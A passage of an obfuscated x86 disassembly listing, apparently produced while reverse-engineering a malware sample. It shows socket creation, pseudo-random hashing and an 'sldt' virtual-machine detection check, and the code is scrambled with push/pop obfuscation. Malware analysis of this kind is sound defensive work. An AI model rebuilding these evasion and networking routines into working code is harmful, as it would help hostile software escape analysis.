; END OF FUNCTION CHUNK FOR sub_9AEE5C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B5A74: ; CODE XREF: sub_9B63D8-8CE1�j
mov edx, dword_9BCB74
mov eax, [edx+10h]
push 6
push 1
push 2
call dword ptr [eax+20h]
push eax
pop esi
mov [ebp-2138h], esi
test esi, esi
jz loc_9AF944
jmp loc_9B54C0
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABC20
loc_9B5A9C: ; CODE XREF: sub_9ABC20+25�j
; DATA XREF: .text:off_9B8FB3�o
push esi
push edi
mov [ebp+var_18], esp
mov esi, ecx
push [ebp+arg_4]
pop ebx
mov [ebp+var_4], 0
push ebx
mov eax, [ebp+arg_0]
push eax
mov ecx, dword_9BBD28
push ecx
call sub_9AE860
add esp, 0Ch
test esi, esi
jz loc_9ADBF9
jmp sub_9B4BF8
; END OF FUNCTION CHUNK FOR sub_9ABC20
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B5AD3: ; CODE XREF: sub_9B1F68-3715�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push 0
call dword ptr [edx+60h]
mov ecx, [ebp-10h]
mov large fs:0, ecx
xor eax, eax
pop edi
pop esi
pop ebx
mov ecx, [ebp-1Ch]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B5B08: ; CODE XREF: sub_9B0930-D0E�j
; DATA XREF: .text:off_9BAF3C�o
pop eax
push dword ptr [eax+4]
pop edx
mov ecx, [edx+4]
test ecx, ecx
jz loc_9B23EF
jmp loc_9AB374
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B5B20: ; CODE XREF: sub_9B63D8-8533�j
push dword ptr [ebp-2130h]
pop eax
jmp loc_9ACBAF
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B5B2C: ; CODE XREF: sub_9AB1A0+2B2F�j
; sub_9AB1A0+46C4�j ...
lea ecx, [edi+edi*2]
shl ecx, 2
push dword_9BCBB4[ecx]
pop eax
inc eax
mov dword_9BCBB4[ecx], eax
mov edx, dword_9BCBBC[ecx]
mov [ebp-38h], edx
push dword_9BCBB8[ecx]
pop ecx
xor eax, ecx
imul eax, 55E206F1h
xor eax, edx
imul eax, 0ADEFED73h
xor eax, ecx
imul eax, 0E4B24259h
xor eax, edx
mov esi, eax
mov [ebp-3Ch], ecx
mov [ebp-1Ch], esi
push esi
call sub_9AFCA0
add esp, 4
test eax, eax
jz short loc_9B5B2C
jmp off_9B890C
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B5B88: ; CODE XREF: sub_9AB1A0+996B�j
dec eax
jmp loc_9B5C6C
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B5B90: ; CODE XREF: sub_9AB1A0+35C7�j
push esi
call sub_9AFCA0
add esp, 4
or eax, eax
jnz loc_9AEA4D
jmp off_9BA08F
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B5BA8: ; CODE XREF: sub_9B63D8-AE6C�j
; DATA XREF: .text:off_9BA364�o
mov dword ptr [ebp-215Ch], 103h
mov edx, dword_9BCB74
push dword ptr [edx+4]
pop eax
lea ecx, [ebp-215Ch]
push ecx
lea edx, [ebp-120h]
push edx
push 0
call dword ptr [eax+4]
test eax, eax
jnz loc_9B4EC8
jmp loc_9AD014
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AD01C
loc_9B5BE3: ; CODE XREF: sub_9AD01C+62�j
mov [ebp+var_4], 0FFFFFFFFh
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9AD01C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9B5BFC: ; CODE XREF: sub_9B4950-3BE0�j
; DATA XREF: .text:off_9B9F17�o
mov dword_9BEC24[edi], ebx
lea ecx, dword_9BEC34[edi]
call sub_9B31A8
lea ecx, dword_9BEC38[edi]
call sub_9B31A8
lea ecx, dword_9BEC3C[edi]
call sub_9B31A8
lea ecx, dword_9BEC40[edi]
call sub_9B31A8
loc_9B5C2E: ; CODE XREF: sub_9B4950-5A10�j
; sub_9B4950-3BE6�j ...
inc esi
jmp loc_9B36AE
; ---------------------------------------------------------------------------
loc_9B5C34: ; CODE XREF: sub_9B4950-98D6�j
cmp dword_9BEC24[esi], ebx
jz loc_9AFE40
jmp off_9B9978
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B5C48: ; CODE XREF: sub_9AB1A0+40�j
push off_9B9632
call dword ptr [edx+18h]
mov dword ptr [ebp-4], 1
mov ebx, [ebp+10h]
mov dword ptr [ebx], 0
call sub_9AF698
push 800h
pop eax
loc_9B5C6C: ; CODE XREF: sub_9AB1A0+A9E9�j
mov [ebp-2Ch], eax
test eax, eax
jle loc_9B5894
jmp off_9B99DC
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ACF9C
loc_9B5C80: ; CODE XREF: sub_9ACF9C+1FEC�j
call sub_9B2160
push eax
pop ebx
mov [ebp-1Ch], ebx
test ebx, ebx
jz loc_9ADA23
jmp loc_9AFCBC
; END OF FUNCTION CHUNK FOR sub_9ACF9C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B6264
loc_9B5C98: ; CODE XREF: sub_9B6264-2C5�j
lea eax, [ebp-99Ch]
push eax
push 0AF286BCBh
pop eax
mov ecx, [ebp-9A4h]
mul ecx
sub ecx, edx
shr ecx, 1
add ecx, edx
shr ecx, 6
push ecx
call sub_9AEAAC
mov dword ptr [ebp-9A0h], 1
loc_9B5CC6: ; CODE XREF: sub_9B6264-2CB�j
mov ecx, dword_9BCB74
push dword ptr [ecx+10h]
pop edx
push esi
call dword ptr [edx+38h]
jmp loc_9AE18F
; END OF FUNCTION CHUNK FOR sub_9B6264
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B5CDC proc near ; CODE XREF: sub_9B037C-49CA�p
; sub_9B1F68-591E�p ...
arg_0 = dword ptr 4
mov eax, dword_9BCB74
mov ecx, [eax]
push [esp+arg_0]
pop eax
push edx
push dword ptr [eax+8]
pop edx
push edx
call dword ptr [ecx+28h]
neg eax
sbb eax, eax
inc eax
retn 4
sub_9B5CDC endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABA3C
loc_9B5CFC: ; CODE XREF: sub_9ABA3C+33CC�j
; DATA XREF: .text:off_9BABA8�o
sub eax, edx
mov [esi+eax-1], bl
loc_9B5D02: ; CODE XREF: sub_9ABA3C+56�j
; sub_9ABA3C+4C9F�j
push dword_9BCB74
pop edx
mov eax, [edx]
lea ecx, [ebp-120h]
push ecx
push ebx
push off_9BA865
push esi
call dword ptr [eax+3Ch]
jmp loc_9B50EC
; END OF FUNCTION CHUNK FOR sub_9ABA3C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0FD0
loc_9B5D24: ; CODE XREF: sub_9B0FD0+C85�j
; DATA XREF: .text:off_9BAF5F�o
push eax
pop ecx
mov [ebp-1Ch], ecx
loc_9B5D29: ; CODE XREF: sub_9B0FD0+50�j
mov edx, dword_9BCB74
push dword ptr [edx+14h]
pop eax
shl ecx, 2
push ecx
push off_9B985C
push offset dword_9BCBD0
call dword ptr [eax+8]
add esp, 0Ch
mov dword_9BCBCC, esi
call sub_9B227C
mov dword_9BEBD4, eax
call sub_9AF698
jmp loc_9B27EF
; END OF FUNCTION CHUNK FOR sub_9B0FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B46CC
loc_9B5D64: ; CODE XREF: sub_9B46CC-7D99�j
; DATA XREF: .text:off_9BA388�o
push 49614D80h
pop eax
jmp loc_9B2C05
; END OF FUNCTION CHUNK FOR sub_9B46CC
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B5D70: ; CODE XREF: sub_9B04A8+A20�j
; DATA XREF: .text:off_9B8D89�o
inc dword ptr [ebp-4040h]
jmp loc_9B5196
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B5D7C: ; CODE XREF: sub_9B3864-5E63�j
; DATA XREF: .text:off_9B96C8�o
movzx edx, word ptr [esi+2]
jmp loc_9B36CA
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABD30
loc_9B5D88: ; CODE XREF: sub_9ABD30+21DC�j
; DATA XREF: .text:off_9B9797�o
mov edx, [esp+0Ch+arg_4]
add edx, 0FFFFFFFEh
cmp eax, edx
jg loc_9B591C
jmp off_9BAA0D
; END OF FUNCTION CHUNK FOR sub_9ABD30
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B174C
loc_9B5DA0: ; CODE XREF: sub_9B174C+285A�j
; DATA XREF: .text:off_9B987A�o
push ecx
pop eax
jmp loc_9B54EA
; END OF FUNCTION CHUNK FOR sub_9B174C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFB1C
loc_9B5DA8: ; CODE XREF: sub_9AFB1C-131D�j
push dword ptr [edi+0Ah]
pop eax
mov [esi+4], eax
mov dword ptr [ebp-1Ch], 0Eh
push dword_9BCB74
pop ecx
xor eax, eax
push dword ptr [ecx+10h]
pop edx
mov ax, [edi+0Eh]
push eax
call dword ptr [edx+8]
jmp off_9B9575
; END OF FUNCTION CHUNK FOR sub_9AFB1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACA48
loc_9B5DD4: ; CODE XREF: sub_9ACA48+466B�j
; DATA XREF: .text:off_9B9F13�o
mov [ebp-4024h], di
neg ebx
sbb ebx, ebx
add ebx, 5
push ebx
push 2002h
lea eax, [edi+2]
mov edi, esi
lea ecx, [ebp-4024h]
call sub_9B5300
mov [ebp-4054h], eax
cmp eax, 4
jnz short loc_9B5E0C
jmp off_9B97C5
; END OF FUNCTION CHUNK FOR sub_9ACA48
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACA48
loc_9B5E0C: ; CODE XREF: sub_9ACA48+A3�j
; sub_9ACA48+11F0�j ...
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop eax
push esi
call dword ptr [eax+38h]
jmp loc_9B26DF
; END OF FUNCTION CHUNK FOR sub_9ACA48
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9B5E20: ; CODE XREF: sub_9AC32C+9E8C�j
jnz loc_9B5034
jmp loc_9B3DA4
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC128
loc_9B5E2C: ; CODE XREF: sub_9AC128+3986�j
push dword_9BCB74
pop edx
lea ecx, [esp+4+var_4]
push ecx
push edi
mov [esp+0Ch+var_4], 10h
push dword ptr [edx+10h]
pop eax
push esi
call dword ptr [eax+0Ch]
loc_9B5E48: ; CODE XREF: sub_9AC128+3980�j
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_9AC128
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B5E4C: ; CODE XREF: sub_9B63D8-69E9�j
cmp cl, 39h
jg loc_9AF944
jmp off_9BA615
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B5E5C: ; CODE XREF: sub_9ADAC4+189C�j
; sub_9ADAC4+8872�j
; DATA XREF: ...
push edi
xor edx, edx
call sub_9B5CDC
test eax, eax
jz loc_9B4CB0
jmp loc_9B4EB8
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B037C
loc_9B5E74: ; CODE XREF: sub_9B037C-49C3�j
push 2000h
lea ecx, [ebp-401Ch]
push ecx
mov eax, 6
lea ecx, [ebp-403Ch]
lea ebx, [ebp-4054h]
call sub_9B0734
mov [ebp-4048h], eax
test al, 1
jz loc_9B2B08
jmp loc_9AD10C
; END OF FUNCTION CHUNK FOR sub_9B037C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B5EAC: ; CODE XREF: sub_9B0930-5329�j
; DATA XREF: .text:off_9BA5E8�o
push off_9BA7FE
mov ecx, [eax]
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx+0Ch]
pop ecx
mov [ecx+0Ch], eax
mov edx, dword_9BCB74
push dword ptr [edx+0Ch]
pop eax
push dword ptr [eax+0Ch]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp off_9B9897
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B5EE0: ; CODE XREF: sub_9B1F68-1D80�j
sub edx, edx
loc_9B5EE2: ; CODE XREF: sub_9B1F68-AE7�j
mov [ebp-34h], edx
loc_9B5EE5: ; CODE XREF: sub_9B1F68+2107�j
cmp edx, ebx
jnb loc_9ACD83
jmp loc_9ADDEC
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AEAAC
loc_9B5EF7: ; CODE XREF: sub_9AEAAC-216�j
mov [ebp+var_4], 0FFFFFFFFh
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
push off_9BAD92
call dword ptr [ecx+1Ch]
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; END OF FUNCTION CHUNK FOR sub_9AEAAC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3150
loc_9B5F24: ; CODE XREF: sub_9B3150-307A�j
push dword ptr [ebx]
pop ecx
mov edx, ecx
shr ecx, 2
push dword ptr [ebx+48h]
pop edi
rep stosd
push edx
pop ecx
and ecx, 3
jmp off_9BA093
; END OF FUNCTION CHUNK FOR sub_9B3150
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B6504
loc_9B5F40: ; CODE XREF: sub_9B6504-4512�j
call sub_9A514A
or eax, eax
jz loc_9B1C93
jmp off_9B9781
; END OF FUNCTION CHUNK FOR sub_9B6504
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B5F54: ; CODE XREF: sub_9AB1A0+216B�j
; sub_9AB1A0+539D�j ...
mov eax, [ebp+0Ch]
push eax
pop edx
dec eax
and edx, edx
mov [ebp+0Ch], eax
jz loc_9AFE6F
jmp off_9B9E87
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B6264
loc_9B5F6C: ; CODE XREF: sub_9B6264+68�j
; DATA XREF: .text:off_9B9F07�o
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop eax
push edi
push edi
lea ecx, [ebp-9A4h]
push ecx
push 980h
lea edx, [ebp-99Ch]
push edx
push edi
push edi
push 4004747Fh
push esi
call dword ptr [eax+4]
or eax, eax
jnz loc_9B5CC6
jmp loc_9B5C98
; END OF FUNCTION CHUNK FOR sub_9B6264
; ---------------------------------------------------------------------------
xor eax, edx
imul eax, 55E206F1h
xor eax, ecx
imul eax, 0ADEFED73h
xor eax, edx
imul eax, 0E4B24259h
xor eax, ecx
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B5FC0 proc near ; CODE XREF: sub_9B14CC+2805�p
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AEB27 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 009B00DC SIZE 0000004E BYTES
; FUNCTION CHUNK AT 009B20C8 SIZE 0000004F BYTES
; FUNCTION CHUNK AT 009B2CFC SIZE 00000031 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B8CB1
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 11Ch
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
xor esi, esi
loc_9B6000: ; CODE XREF: sub_9B5FC0-3298�j
mov [ebp+var_12C], esi
cmp esi, 2
jge loc_9AEB27
jmp off_9B9018
sub_9B5FC0 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9B6018: ; CODE XREF: sub_9AF25C-3645�j
; DATA XREF: .text:off_9BAB88�o
mov edi, dword_9BCB98
mov [ebp-34h], edi
call sub_9B227C
add eax, edi
cmp eax, ebx
jnb loc_9AB8D1
jmp off_9B89D3
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADE44
loc_9B6038: ; CODE XREF: sub_9ADE44+4B�j
pop ebx
; END OF FUNCTION CHUNK FOR sub_9ADE44
; START OF FUNCTION CHUNK FOR sub_9B2C30
loc_9B6039: ; CODE XREF: sub_9B2C30+8�j
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_9B2C30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9B603C: ; CODE XREF: sub_9AF25C+5467�j
; DATA XREF: .text:off_9B8DD4�o
mov eax, [esi+48h]
call sub_9AC448
mov [esi+48h], ebx
mov dword_9BBD30, edi
push dword ptr [ebp-1Ch]
pop ecx
mov dword_9BBD2C, ecx
push 4
mov ecx, 4
push off_9B8DBE
jmp off_9BAF0E
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B606C: ; CODE XREF: sub_9B1A08-263E�j
lea edx, ds:0Fh[edi*4]
jmp loc_9B445E
; END OF FUNCTION CHUNK FOR sub_9B1A08
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B6078 proc near ; CODE XREF: sub_9AEC20+57�p
; sub_9AFF64+5C�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 009AAFC8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AB94D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B09B4 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009B5A5C SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B9A25
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
mov ebx, [ebp+arg_4]
mov byte ptr [ebx], 0
mov edx, [ebp+arg_0]
test dl, 1
jz loc_9B5A5C
jmp off_9B900C
sub_9B6078 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B60C0: ; CODE XREF: sub_9B0930+15E4�j
jz loc_9B23EF
jmp off_9B969F
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B60CC: ; CODE XREF: sub_9B63D8-3719�j
inc eax
jmp loc_9AC8EF
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1334
loc_9B60D4: ; CODE XREF: sub_9B1334+8�j
; DATA XREF: .text:off_9B979F�o
mov dword ptr [eax], 10h
loc_9B60DA: ; CODE XREF: sub_9B1334+2�j
mov ecx, esi
xor eax, eax
mov [ecx], eax
mov [ecx+4], eax
mov [ecx+8], eax
mov [ecx+0Ch], eax
mov [esi+4], edx
push [esp+arg_0]
pop edx
mov word ptr [esi], 2
push dword_9BCB74
pop eax
mov ecx, [eax+10h]
push edx
call dword ptr [ecx+8]
mov [esi+2], ax
retn 4
; END OF FUNCTION CHUNK FOR sub_9B1334
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B610C: ; CODE XREF: sub_9B1D80-441F�j
or ebx, ebx
jnz loc_9AE945
jmp loc_9B56D0
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B611C proc near ; CODE XREF: sub_9B6078-613�j
; DATA XREF: .text:off_9B96E0�o
; FUNCTION CHUNK AT 009AB944 SIZE 00000009 BYTES
push ebx
pop edi
dec edi
loc_9B611F: ; CODE XREF: sub_9B611C+9�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_9B611F
jmp loc_9AB944
sub_9B611C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B612C: ; CODE XREF: sub_9B63D8-43D7�j
lea eax, [eax+eax*4]
shl eax, 1
movsx ecx, cl
mov [ebp-2130h], eax
lea eax, [ecx+eax-30h]
mov [ebp-2130h], eax
mov ecx, [ebp-2124h]
add ecx, eax
cmp ecx, 200000h
jg loc_9AF944
jmp loc_9ABA0C
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B2E04
loc_9B6160: ; CODE XREF: sub_9B2E04-9E8�j
mov edx, dword_9BCB74
mov eax, [edx+10h]
push 11h
push 2
push 2
call dword ptr [eax+20h]
mov edi, eax
mov [ebp+var_4040], edi
and edi, edi
jz loc_9B107C
jmp off_9B99F6
; END OF FUNCTION CHUNK FOR sub_9B2E04
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B6188: ; CODE XREF: sub_9AC6DC+3784�j
; sub_9AC6DC+5DF6�j
push 0
push 5Fh
push edi
push esi
call __allmul
push 0
push 64h
push edx
push eax
call __aulldiv
cmp ebx, edx
jb loc_9B0051
jmp off_9B9461
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9B61AC: ; CODE XREF: sub_9AC32C-E48�j
push edi
call dword ptr [edx+5Ch]
cmp eax, edi
jl loc_9AC5F8
jmp loc_9B5E20
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B61C0: ; CODE XREF: sub_9B1F68+3923�j
; DATA XREF: .text:off_9B87F6�o
push 0
push esi
call sub_9B0E7C
mov eax, dword_9BCB74
mov ecx, [eax+10h]
push esi
call dword ptr [ecx+38h]
mov dword ptr [ebx], 0
mov edi, [ebp-34h]
inc edi
jmp loc_9B01E0
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B61E4: ; CODE XREF: sub_9B1A08+2A71�j
call sub_9B2010
or eax, eax
jz loc_9AF398
jmp loc_9AD1C4
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9B61FC: ; CODE XREF: sub_9B03E8+4F�j
sldt ax
or ax, ax
setnz al
movzx eax, al
mov edi, eax
loc_9B620A: ; CODE XREF: sub_9B03E8-A2E�j
mov [ebp-158h], edi
push dword_9BCB74
pop edx
mov eax, [edx]
call dword ptr [eax+30h]
mov esi, eax
mov [ebp-15Ch], esi
loc_9B6224: ; CODE XREF: sub_9B03E8-F0C�j
; sub_9B03E8+26F1�j
push dword_9BCB74
pop ecx
mov edx, [ecx]
call dword ptr [edx+30h]
sub eax, esi
cmp eax, 3E8h
jnb loc_9B2B4C
jmp loc_9AF4C4
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3A74
loc_9B6244: ; CODE XREF: sub_9B3A74-4CA9�j
mov dword ptr [ebp-128h], 1
loc_9B624E: ; CODE XREF: sub_9B3A74-7266�j
; sub_9B3A74-4CAF�j ...
mov eax, [ebp-124h]
and eax, eax
jz loc_9B03D6
jmp loc_9B03C8
; END OF FUNCTION CHUNK FOR sub_9B3A74
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B6264 proc near ; CODE XREF: sub_9B4950:loc_9AC0B0�p
; FUNCTION CHUNK AT 009AE18F SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009B5C98 SIZE 00000041 BYTES
; FUNCTION CHUNK AT 009B5F6C SIZE 00000038 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B9779
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 998h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
xor edi, edi
mov [ebp-9A0h], edi
mov [ebp-4], edi
push dword_9BCB74
pop eax
mov ecx, [eax+10h]
push edi
push edi
push edi
push edi
push 2
push 2
call dword ptr [ecx+60h]
mov esi, eax
mov [ebp-9A8h], esi
cmp esi, 0FFFFFFFFh
jz loc_9AE18F
jmp off_9B9F07
sub_9B6264 endp
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
mov esi, [ebp-12Ch]
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9B62E4: ; CODE XREF: sub_9B3408-5433�j
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push off_9BADC8
call dword ptr [ecx+1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
push esi
pop eax
pop edi
pop esi
pop ebx
push dword ptr [ebp-1Ch]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B6318: ; CODE XREF: sub_9ADAC4-2686�j
; DATA XREF: .text:off_9BA637�o
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop eax
push 7FFFFFFFh
push ebx
call dword ptr [eax+10h]
mov [ebp-58h], eax
or eax, eax
jnz loc_9ADCDC
jmp off_9B92D1
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B633C: ; CODE XREF: sub_9B0930-36D0�j
push dword ptr [eax+18h]
pop eax
cmp dword ptr [eax], 0
jz loc_9B23EF
jmp loc_9B2790
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B6370
loc_9B6350: ; CODE XREF: sub_9B6370+14�j
push esi
push [esp+8+arg_0]
pop esi
push edi
loc_9B6357: ; CODE XREF: sub_9B6370-4B50�j
mov eax, edx
shld edx, ecx, 1
shr eax, 1Fh
shl ecx, 1
or eax, ecx
xor edi, edi
push eax
pop ecx
movzx eax, cl
jmp loc_9B180C
; END OF FUNCTION CHUNK FOR sub_9B6370
; =============== S U B R O U T I N E =======================================
sub_9B6370 proc near ; CODE XREF: sub_9ADCEC-245B�p
; sub_9B3FF8-82FE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 009B05F8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009B180C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 009B6350 SIZE 00000020 BYTES
mov ecx, [esp+arg_4]
